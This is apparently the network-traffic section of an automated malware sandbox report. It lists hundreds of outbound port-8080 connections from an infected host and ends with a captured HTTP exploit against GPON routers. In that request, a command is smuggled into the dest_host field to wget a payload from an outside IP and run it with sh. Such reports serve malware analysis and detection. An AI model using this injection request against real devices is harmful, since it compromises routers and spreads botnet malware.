      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 93.202.244.234:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 106.67.170.76:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 176.9.198.84:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 70.8.168.241:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 216.171.157.65:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 196.238.226.71:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 198.33.223.46:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 5.4.241.134:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 165.226.50.142:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 108.35.84.49:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 197.16.85.241:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 179.246.18.0:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 122.223.165.104:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 188.34.7.134:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 101.139.147.153:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 87.226.237.136:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 166.202.74.29:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 129.196.147.204:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 115.129.123.238:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 189.93.58.94:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 14.55.109.235:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 103.47.154.52:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 20.96.77.192:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 27.28.237.116:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 138.129.177.41:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 88.201.192.4:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 92.182.41.253:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 92.77.209.111:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 147.157.231.71:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 72.102.79.222:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 174.9.238.203:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 49.180.192.160:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 123.31.107.224:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 24.150.164.91:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 146.67.99.96:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 98.223.146.208:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 114.165.254.52:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 183.203.30.142:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 87.209.11.184:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 89.125.129.29:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 139.166.18.121:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 188.137.49.169:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 181.190.178.10:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 208.155.16.186:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 96.174.25.183:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 182.177.208.70:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 150.3.79.217:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 205.228.134.149:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 131.252.166.53:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 74.171.87.188:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 98.53.186.4:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 130.233.34.15:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 102.189.232.8:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 13.235.160.252:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 182.121.36.15:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 108.193.118.154:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 208.128.214.239:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 109.197.224.77:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 159.97.123.241:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 117.47.190.107:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 52.104.198.174:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 14.166.162.9:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 190.52.247.27:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 143.155.158.84:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 194.209.95.58:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 205.3.60.222:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 216.7.95.117:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 64.17.184.230:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 168.222.162.25:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 143.43.69.192:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 63.107.120.158:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 129.213.69.245:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 139.192.98.29:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 194.87.64.212:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 193.187.26.66:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 213.154.157.209:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 32.45.67.37:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 142.170.100.213:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 170.8.43.162:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 4.51.93.151:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 93.184.239.189:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 206.52.124.230:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 72.3.132.38:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 128.14.126.17:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 18.130.220.29:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 1.157.46.79:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 17.6.61.136:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 91.97.246.164:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 138.40.205.61:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 203.189.215.158:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 162.188.220.119:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 197.234.95.123:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 173.34.26.204:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 131.231.64.57:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 44.221.1.249:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 153.30.191.40:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 97.39.19.35:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 210.176.233.181:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 126.158.210.53:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 100.11.60.197:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 165.48.254.135:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 150.199.193.36:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 60.254.159.101:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 191.32.230.114:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 82.49.87.35:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 49.157.234.221:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 25.96.130.66:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 184.100.132.97:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 147.128.223.62:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 86.104.156.59:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 205.104.234.100:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 163.143.216.64:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 110.195.236.210:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 49.253.34.235:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 74.9.26.15:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 103.26.37.101:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 141.78.56.196:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 187.73.199.234:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 125.98.123.59:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 178.8.79.197:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 18.102.231.65:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 25.19.191.40:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 25.242.63.219:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 124.26.29.36:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 40.22.155.241:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 199.251.98.255:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 35.51.54.205:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 156.158.21.10:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 119.24.209.135:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 52.88.49.175:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 209.80.253.234:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 54.0.248.161:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 117.202.254.246:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 63.77.201.184:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 208.188.24.227:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 25.221.187.129:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 173.198.35.227:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 120.168.243.109:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 120.138.245.0:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 139.111.171.3:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 223.254.210.245:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 145.234.32.67:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 46.42.103.184:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 147.7.26.123:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 183.215.69.235:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 17.186.213.45:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 196.175.123.211:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 221.121.57.233:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 164.83.253.250:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 85.26.219.136:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 152.236.141.218:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 220.245.59.83:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 42.112.111.24:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 115.97.52.88:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 220.88.108.109:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 83.38.134.79:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 115.191.149.148:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 132.181.197.49:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 8.18.156.59:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 53.123.66.47:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 114.211.186.56:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 186.108.48.31:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 134.42.16.224:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 87.62.75.1:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 156.169.56.193:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 155.81.95.100:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 168.7.149.188:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 40.5.51.89:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 81.185.103.156:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 115.205.111.215:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 63.28.74.135:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 69.42.22.172:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 46.152.196.111:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 105.167.153.153:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 32.219.190.92:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 4.125.201.176:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 220.246.27.120:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 178.114.149.250:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 2.198.53.150:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 210.201.157.80:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 96.242.255.53:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 94.157.189.118:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 176.1.246.250:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 18.114.100.148:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 195.108.224.36:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 108.150.51.85:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 45.58.33.8:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 142.89.41.188:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 25.187.253.83:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 86.240.38.7:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 183.68.198.93:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 131.104.43.174:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 110.156.177.81:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 95.255.197.244:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 212.177.176.85:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 108.222.155.110:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 164.224.132.202:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 38.14.207.189:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 119.131.54.246:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 212.244.15.210:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 158.206.2.9:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 210.134.63.24:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 138.107.216.61:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 1.192.140.15:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 180.121.250.161:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 209.230.254.131:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 51.232.147.244:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 77.152.67.38:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 136.239.196.231:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 52.39.115.237:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 165.46.253.152:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 81.172.94.101:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 169.236.81.175:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 198.240.230.25:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 125.74.36.253:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 222.192.254.53:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 159.181.167.136:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 85.171.97.74:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 35.50.210.17:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 2.92.210.87:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 51.58.226.16:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 101.161.106.45:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 53.70.37.139:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 143.30.160.126:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 101.139.145.79:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 43.237.88.198:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 49.53.126.202:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 218.88.64.18:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 187.53.253.197:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 137.246.253.21:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 174.10.52.157:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 52.95.190.177:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 143.103.225.134:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 122.211.104.135:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 98.135.213.44:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 124.241.134.140:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 64.115.230.234:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 14.137.116.79:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 13.239.184.25:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 44.222.228.94:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 167.121.76.157:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 152.223.43.50:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 175.235.150.39:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 152.224.2.232:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 50.200.15.128:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 88.25.31.146:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 46.148.50.128:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 186.210.37.184:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 64.64.241.178:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 93.106.239.133:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 85.97.195.110:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 89.186.118.194:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 200.58.158.140:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 184.241.92.170:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 102.0.103.193:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 120.103.178.21:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 204.91.251.107:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 66.77.232.178:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 136.23.47.209:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 107.8.20.130:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 108.118.0.28:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 94.18.62.42:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 112.81.202.253:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 128.87.26.117:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 126.61.59.219:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 51.13.169.152:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 102.187.89.227:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 145.67.46.192:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 110.8.160.192:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 14.25.98.250:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 147.59.142.80:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 102.70.147.108:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 115.45.82.172:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 128.92.54.38:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 50.75.175.177:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 204.163.41.197:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 203.77.28.157:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 179.197.228.231:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 78.159.244.7:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 52.77.197.183:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 150.72.225.129:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 179.239.246.20:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 113.144.236.41:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 2.192.213.179:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 131.248.45.137:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 142.205.206.254:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 146.58.212.247:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 40.213.143.153:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 124.28.3.242:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 160.107.27.220:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 40.150.102.207:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 23.34.175.207:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 111.214.140.194:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 66.79.28.94:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 149.90.238.99:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 154.5.211.208:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 137.193.33.220:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 207.102.18.22:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 203.180.131.119:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 47.203.244.106:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 153.248.10.148:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 37.137.20.126:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 103.85.38.91:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 212.21.92.63:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 47.11.55.190:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 184.169.10.143:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 178.7.107.12:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 80.134.20.210:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 175.108.148.142:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 163.147.103.134:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 219.248.52.118:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 120.213.207.155:8080
      Source: unknownTCP traffic detected without corresponding DNS query: 162.56.228.146
      Source: unknownTCP traffic detected without corresponding DNS query: 86.188.162.146
      Source: unknownTCP traffic detected without corresponding DNS query: 57.156.233.34
      Source: unknownTCP traffic detected without corresponding DNS query: 166.108.78.69
      Source: unknownTCP traffic detected without corresponding DNS query: 69.117.67.66
      Source: unknownTCP traffic detected without corresponding DNS query: 114.142.93.156
      Source: unknownTCP traffic detected without corresponding DNS query: 143.104.116.185
      Source: unknownTCP traffic detected without corresponding DNS query: 154.152.66.148
      Source: unknownTCP traffic detected without corresponding DNS query: 219.21.162.60
      Source: unknownTCP traffic detected without corresponding DNS query: 177.172.60.33
      Source: unknownTCP traffic detected without corresponding DNS query: 81.62.71.122
      Source: unknownTCP traffic detected without corresponding DNS query: 86.152.184.126
      Source: unknownTCP traffic detected without corresponding DNS query: 116.193.143.237
      Source: unknownTCP traffic detected without corresponding DNS query: 170.77.195.165
      Source: unknownTCP traffic detected without corresponding DNS query: 111.13.88.155
      Source: unknownTCP traffic detected without corresponding DNS query: 153.128.74.251
      Source: unknownTCP traffic detected without corresponding DNS query: 1.46.205.249
      Source: unknownTCP traffic detected without corresponding DNS query: 117.50.126.121
      Source: unknownTCP traffic detected without corresponding DNS query: 97.86.31.252
      Source: unknownTCP traffic detected without corresponding DNS query: 46.148.5.36
      Source: unknownTCP traffic detected without corresponding DNS query: 18.81.57.180
      Source: unknownTCP traffic detected without corresponding DNS query: 102.190.45.206
      Source: unknownTCP traffic detected without corresponding DNS query: 125.253.251.71
      Source: unknownTCP traffic detected without corresponding DNS query: 71.133.72.130
      Source: unknownTCP traffic detected without corresponding DNS query: 219.125.145.50
      Source: unknownTCP traffic detected without corresponding DNS query: 109.63.8.86
      Source: unknownTCP traffic detected without corresponding DNS query: 190.83.0.22
      Source: unknownTCP traffic detected without corresponding DNS query: 182.127.144.224
      Source: unknownTCP traffic detected without corresponding DNS query: 87.143.25.214
      Source: unknownTCP traffic detected without corresponding DNS query: 158.132.100.167
      Source: unknownTCP traffic detected without corresponding DNS query: 185.115.127.172
      Source: unknownTCP traffic detected without corresponding DNS query: 155.82.150.221
      Source: unknownTCP traffic detected without corresponding DNS query: 79.69.200.124
      Source: unknownTCP traffic detected without corresponding DNS query: 52.28.253.237
      Source: unknownTCP traffic detected without corresponding DNS query: 99.70.90.174
      Source: unknownTCP traffic detected without corresponding DNS query: 32.225.180.162
      Source: unknownTCP traffic detected without corresponding DNS query: 111.108.31.16
      Source: unknownTCP traffic detected without corresponding DNS query: 177.107.182.85
      Source: unknownTCP traffic detected without corresponding DNS query: 164.31.158.101
      Source: unknownTCP traffic detected without corresponding DNS query: 128.184.122.68
      Source: unknownTCP traffic detected without corresponding DNS query: 38.173.64.158
      Source: unknownTCP traffic detected without corresponding DNS query: 104.96.85.29
      Source: unknownTCP traffic detected without corresponding DNS query: 194.232.66.175
      Source: unknownTCP traffic detected without corresponding DNS query: 202.225.238.113
      Source: unknownTCP traffic detected without corresponding DNS query: 182.82.29.185
      Source: unknownTCP traffic detected without corresponding DNS query: 73.220.142.42
      Source: unknownTCP traffic detected without corresponding DNS query: 223.41.145.228
      Source: unknownTCP traffic detected without corresponding DNS query: 20.162.22.63
      Source: unknownTCP traffic detected without corresponding DNS query: 166.62.213.91
      Source: unknownTCP traffic detected without corresponding DNS query: 37.0.35.48
      Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 30 33 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
